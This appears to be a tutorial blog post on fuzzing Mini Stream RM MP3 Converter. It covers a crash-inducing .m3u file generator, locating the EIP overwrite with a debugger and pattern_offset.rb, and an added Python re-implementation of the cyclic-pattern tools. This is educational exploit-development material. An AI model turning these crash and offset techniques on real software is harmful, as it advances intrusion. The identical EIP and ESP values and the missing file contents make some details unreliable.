In the two previous articles we learned about Exploitation via Buffer Overflow Vulnerability - Stack Based Overflow (Case Study: Buffer Overflow in Mini Stream RM MP3 Converter).
In this article we will explain how we got the fuzzer code.
To make a fuzzer, we create a file containing many characters to make Mini Stream crash:
-----------------------------------------------------------------
# start with an empty buffer and fill it with 20000 'A' characters (0x41)
buffer = ""
buffer += "\x41" * 20000
# write the buffer into an .m3u playlist file that Mini Stream will open
filename = "bikinkacau" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
-----------------------------------------------------------------
Then load this file with Mini Stream: error code -71 appears. The same error also appears when we load any file that does not match the application's format.
Let's try to open an original .m3u file.
OK, the file opens successfully; now let's look at the content of the file.
Next, let's append the pattern characters created by pattern_create.rb after the end of the content.
The content of the file becomes:
Next, load the modified TV.m3u with Mini Stream; the application closes suddenly. That means we succeeded in making a fuzzer that crashes the application.
Now we will analyze at which character position the EIP is overwritten, by attaching Mini Stream to OllyDbg and then loading TV.m3u.
We will see that the EIP is overwritten.
Let's analyze at what input position the EIP and ESP have been overwritten. We can use pattern_offset.rb to do that.
EIP :
-----------------------------------------------------------------
#/pentest/exploits/framework/tools/pattern_offset.rb 69573469 20000
-----------------------------------------------------------------
ESP :
-----------------------------------------------------------------
#/pentest/exploits/framework/tools/pattern_offset.rb 69573469 20000
-----------------------------------------------------------------
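To make the pattern_create.rb / pattern_offset.rb step above reproducible offline, here is an added example (not code from the original post, and not the Metasploit tools themselves) that re-implements the same cyclic "Aa0Aa1Aa2..." pattern in Python. `pattern_create` and `pattern_offset` are names chosen for this example; `offset_in_file` is an added helper that accounts for the original .m3u content placed before the pattern, because pattern_offset.rb reports the position inside the pattern, not inside the whole file. The register value 69573469 is the one shown in the post; `struct.pack("<I", ...)` turns it into the four little-endian ASCII bytes that actually sit in memory, which is what pattern_offset.rb searches for.

```python
# Added example: re-implementation of the pattern_create / pattern_offset logic.
# Not the original post's code and not the Metasploit scripts; written to check
# the crash-triage numbers offline.
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
HEX_CHARS = "0123456789abcdefABCDEF"


def pattern_create(length):
    """Build the cyclic 'Aa0Aa1Aa2...' pattern of the given length.

    Each 3-byte triplet (upper, lower, digit) is unique within one full cycle
    of 26*26*10*3 = 20280 bytes, so any 4-byte window inside that cycle maps
    to exactly one position. For longer lengths the cycle repeats.
    """
    out = []
    total = 0
    while total < length:
        for u in UPPER:
            for l in LOWER:
                for d in DIGIT:
                    out.append(u + l + d)
                    total += 3
                    if total >= length:
                        return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=20000):
    """Find `value` in the pattern, mirroring how pattern_offset.rb is used.

    `value` is either the 8-hex-digit register content copied from the
    debugger (e.g. '69573469'), which is unpacked little-endian into the ASCII
    bytes that overwrote the register, or a plain ASCII fragment searched as-is.
    Returns the 0-based offset within the pattern, or -1 if it is not present.
    """
    pat = pattern_create(length)
    if len(value) == 8 and all(c in HEX_CHARS for c in value):
        needle = struct.pack("<I", int(value, 16)).decode("ascii", "replace")
        pos = pat.find(needle)
        if pos != -1:
            return pos
    # fall back to searching the literal text (e.g. 'Aa3Aa4')
    return pat.find(value)


def offset_in_file(prefix, value, length=20000):
    """Offset of `value` relative to the start of the whole fuzz file.

    The post appends the pattern after the original .m3u content, so the
    byte position in the file is the prefix length plus the pattern offset.
    Returns -1 if the value is not in the pattern at all.
    """
    pos = pattern_offset(value, length)
    if pos == -1:
        return -1
    return len(prefix) + pos


if __name__ == "__main__":
    # constructed sample prefix standing in for the original TV.m3u content
    sample_prefix = "#EXTM3U\r\n"
    print("pattern offset of 69573469:", pattern_offset("69573469", 20000))
    print("offset in file:", offset_in_file(sample_prefix, "69573469", 20000))
```

Running this with the post's value prints the position of the bytes `i4Wi` inside a 20000-byte pattern; the file offset is only meaningful once the exact length of the content that preceded the pattern in TV.m3u is known, which is why the helper takes it as a parameter rather than guessing.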